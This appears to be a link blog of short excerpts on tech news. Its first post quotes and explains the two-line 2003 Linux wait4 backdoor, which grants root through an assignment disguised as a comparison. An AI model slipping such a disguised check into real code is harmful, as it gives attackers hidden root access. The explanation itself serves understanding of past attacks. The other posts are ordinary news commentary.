The Linux Backdoor Attempt of 2003

Posted on by

What did the change do? This is where it gets really interesting. The change modified the code of a Linux function called wait4, which a program could use to wait for something to happen. Specifically, it added these two lines of code:

if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) 
     retval = -EINVAL;

via The Linux Backdoor Attempt of 2003.

Setting the user ID to zero is a problem because user ID number zero is the “root” user, which is allowed to do absolutely anything it wants—to access all data, change the behavior of all code, and to compromise entirely the security of all parts of the system. So the effect of this code is to give root privileges to any piece of software that called wait4 in a particular way that is supposed to be invalid. In other words … it’s a classic backdoor.

The check should have been current -> uid == 0.  Sneaky!

The great Verizon FiOS ripoff

Posted on by

After decades of demanding and getting rate hikes and tax breaks in return for promising to deliver broadband internet access to schools, libraries, hospitals and every home and business in their territories, Verizon is now making it clear that it is no longer expanding FiOS, its fiber optic cable service.

via The great Verizon FiOS ripoff.

America is 15th or 33rd in the world in broadband, depending on which international or research group you believe. The failure to properly upgrade the PSTN, and the con of FiOS expenditures, has cost a large swath of America — from Massachusetts through Virginia and the old GTE territories, such as parts of California — a generation of technology, innovation and GDP growth.

New York Just Subpoenaed Airbnb to Hand Over Its User Data

Posted on by

The city is fighting the startup for breaking local laws against operating an illegal hotel out of your home, worried that hustlers are abusing the online service to turn a profit. To that end, New York Attorney General Eric Schneiderman just slapped the company with a subpoena to hand over the user data of all New Yorkers who’ve listed their apartment on the site, the New York Daily News reported today. That’s about 225,000 users.

via New York Just Subpoenaed Airbnb to Hand Over Its User Data | Motherboard.

What If IBM’s Watson Dethroned the King of Search?

Posted on by

Google continues to top the search game with the mission of “organiz[ing] the world’s information and mak[ing] it universally accessible and useful.” But now this mission is limited given how rapidly artificial intelligence has pushed the boundaries of what’s possible. It’s raised expectations of what we expect from computers. Even Siri has. In that mindset, Google is basically a gigantic database with rich access and retrieval mechanisms without the ability to create new knowledge.

via Google in Jeopardy: What If IBM’s Watson Dethroned the King of Search? | Wired Opinion | Wired.com.

In other words: Google can retrieve, but Watson can create.

Google wants a patent on splitting the restaurant bill

Posted on by

Google Patent Application, October 2013: “For example, continuing with the example of FIG. 4, assume that Users A-C have drinks at a bar and User B pays a bill of $45 for the drinks. User B adds the payment transaction as an expenditure of the group and allocates $15 of the transaction to User A, $20 to User B, $10 to User C. In this example, the balance module 308 would update the individual balances of Users A-C to indicate that User B now owes $115 to User A ($130-$15) and User C owes $10 to User B ($0+$10).”

via No joke: Google wants a patent on splitting the restaurant bill – GeekWire.

I didn’t think one could patent a mathematical formula.

Linux-capable Arduino TRE debuts at Maker Faire Rome

Posted on by

As Zoe Romano puts it in an Arduino blog post, “the Arduino TRE is two Arduinos in one.” Basically, the new ARM Cortex-A8-based Sitara AM335x’s job is to run Linux applications and manage the SBC’s PC-style interfaces (video, audio, Ethernet, USB, optional WiFi, etc.), while an Atmel ATmega microcontroller takes care of the SBC’s real-world I/O (analog inputs, digital I/O, PWM outputs, etc) and handles the interface to shields (Arduino expansion modules) in a fully AVR-compatible manner. Best of all, Romano points out, the 1GHz TI ARM processor offers up to “100 times more performance” than Arduino’s earlier Leonardo and Uno boards, writes Romano.

via Linux-capable Arduino TRE debuts at Maker Faire Rome ·  LinuxGizmos.com.

What’s unique about the TRE, however, is that its Linux OS runs on an ARM processor that’s truly integrated into the SBC’s basic architecture, as opposed to being a collateral benefit of a WiFi add-on module. As a result, the TRE will support a “full Linux” OS in contrast to the Yun’s Linino OS, a custom version of the lightweight OpenWRT embedded Linux distribution.

Cerowrt

Posted on by

CeroWrt is a project built on the OpenWrt firmware to resolve the endemic problems of bufferbloat in home networking today, and to push forward the state of the art of edge networks and routers. Projects include proper IPv6 support, tighter integration with DNSSEC, and most importantly, reducing bufferbloat in both the wired and wireless components of the stack.

via Cerowrt – Overview – Bufferbloat.

From their wiki page on buffer bloat:

Bufferbloat is a huge drag on Internet performance created, ironically, by previous attempts to make it work better. The one-sentence summary is “Bloated buffers lead to network-crippling latency spikes.”

The bad news is that bufferbloat is everywhere, in more devices and programs than you can shake a stick at. The good news is, bufferbloat is relatively easy to fix. The even better news is that fixing it may solve a lot of the service problems now addressed by bandwidth caps and metering, making the Internet faster and less expensive for both consumers and providers.

Text Analyser Reveals Emotional Temperature of Novels and Fairy Tales

Posted on by

Beyond that, once an entire corpus of work has been analysed in this way, it becomes possible to compare them in unprecedented depth and detail. For example, Mohammad has analysed all of the Brothers Grimm fairy tales and arranged them in order of negative word density. The darkest turns out to be a tale called Gambling Hansel.

via Text Analyser Reveals Emotional Temperature of Novels and Fairy Tales  — The Physics arXiv Blog — Medium.

5 Reasons Every Company Should Have A Honeypot

Posted on by

While honeypots have been used widely by researchers to study the methods of attackers, they can be very useful to defenders as well. Here are five advantages that the digital sandboxes can bring to companies.

via 5 Reasons Every Company Should Have A Honeypot — Dark Reading.

Honeypots fill the gap, because attackers have a much more difficult time predicting their use and countering the defenses, Strand says. Because production honeypots are machines that no legitimate user should be accessing, they also have a low false positive rate.

Ciena Packs New 10-Gig Punch

Posted on by

The 5160 and 5142 Service Aggregation Switches are aimed at making it more economical for service providers to offer 10-Gig Ethernet services, a rapidly growing category of Ethernet today, says Mike Adams, VP of Product & Technical Marketing at Ciena. The new boxes also target the internal bandwidth needs of large enterprises in datacenters, and they are designed for outdoor deployment so service providers can push more bandwidth closer to their customers and use these switches as aggregation points.

via Ciena Packs New 10-Gig Punch | Light Reading.

By deploying pairs of 5160s in core network locations such as Central Offices, Ritter has been able to have carrier-grade redundancy with dual homing for fiber-optic rings while achieving the same throughput as a much more expensive 10 Gig core switch, he says.